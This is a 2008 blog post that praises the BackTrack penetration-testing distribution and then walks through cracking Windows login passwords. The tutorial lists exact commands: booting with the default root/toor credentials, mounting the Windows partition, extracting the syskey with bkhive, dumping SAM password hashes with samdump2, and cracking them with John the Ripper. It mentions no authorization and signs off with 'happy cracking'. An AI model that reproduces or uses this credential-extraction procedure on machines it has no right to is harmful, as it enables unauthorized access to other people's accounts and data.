Tuesday, September 2, 2008

Crack Windows Password With Back|track

BackTrack is the most Top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes.

It's evolved from the merge of the two wide spread distributions - Whax and Auditor Security Collection. By joining forces and replacing these distributions, BackTrack has gained massive popularity and was voted in 2006 as the #1 Security Live Distribution by insecure.org. Security professionals as well as new comers are using BackTrack as their favorite toolset all over the globe.

BackTrack has a long history and was based on many different linux distributions until it is now based on a Slackware linux distribution and the corresponding live-CD scripts by Tomas M. (www.slax.org) . Every package, kernel configuration and script is optimized to be used by security penetration testers. Patches and automation have been added, applied or developed to provide a neat and ready-to-go environment.

After coming into a stable development procedure during the last releases and consolidating feedbacks and addition, the team was focused to support more and newer hardware as well as provide more flexibility and modularity by restructuring the build and maintenance processes. With the current version, most applications are built as individual modules which help to speed up the maintenance releases and fixes.

Because Metasploit is one of the key tools for most analysts it is tightly integrated into BackTrack and both projects collaborate together to always provide an on-the-edge implementation of Metasploit within the BackTrack CD-Rom images or the upcoming remote-exploit.org distributed and maintained virtualization images (like VMWare images appliances).

Being superior while staying easy to use is key to a good security live cd. We took things a step further and aligned BackTrack to penetration testing methodologies and assessment frameworks (ISSAF and OSSTMM). This will help our professional users during their daily reporting nightmares.

Currently BackTrack consists of more than 300 different up-to-date tools which are logically structured according to the work flow of security professionals. This structure allows even newcomers to find the related tools to a certain task to be accomplished. New technologies and testing techniques are merged into BackTrack as soon as possible to keep it up-to-date From : Remote-Exploit.

Now we Crack Windows Password With Back|track.

Step one boot with cd backtrack and login:

User : root
Password : toor

and open terminal with command :

bt~# mount

this command for check windows partation.. backtrack can read windows partation or not

and now look line 5 [ /dev/hda1 on /mnt/hda1 type ntfs (ro, noatime) ]
the meaning is, partation NTFS has been mount to directory /mnt/hda1 and now we cant acces windows file
with backtrack. this partation has mount with acces "read only" [ro] the meaning...we cannot change or
write in this directory.

and now we acces password windows directory [ \WINDOWS\system32\config\ ]

bt~# ls -l /mnt/hda1/WINDOWS/system32/config/sam

and now our mission to got syskey! for got this syskey we can use bkhive program.
bt~# bkhive /mnt/hda1/WINDOWS/system32/config/system my_syskey

bt~# ls -l

windows has put password in sam file....this password has been encrypt with windows system
and now we try to got hash from windows sam file
what program we use? we can use "samdump2"....this program has been packed in backtrack

bt~# samdump2 /mnt/hda1/WINDOWS/system32/config/sam my_syskey

look this screen shot.... we got the hash value from windows password...
and we must crack again with program ophcrack aor john the Ripper.. on this case im use a john the Ripper for cracking :)

first we must save the password hash to txt file.. with command:

bt~# samdump2 /mnt/hda1/WINDOWS/system32/config/sam my_syskey > hash.txt

bt~# ls -l

and now has save the hash in txt file with name "hash.txt"

Now John the Ripper ready to cracking...

bt~# /pentest/password/Jhon-1.7.2/run/John hash.txt

bt~# /pentest/password/Jhon-1.7.2/run/John.pot

oops the password found [ POTONGAN ]... but i dont understand why John the Ripper separated
the end alphabet [ N ]

but we can show the password again with command:

bt~# /pentest/password/Jhon-1.7.2/run/John --show hash.txt

done...happy cracking :) and sorry about my bad engglish !


Post a Comment


Subscribe in Bloglines Msn bot last visit powered by MyPagerank.Net Yahoo bot last visit powered by MyPagerank.Net
I heart FeedBurner downtime checker The Ubuntu Counter Project - user number # 31290

Twitter Delicious Facebook Digg Stumbleupon Favorites More

Powered by TadPole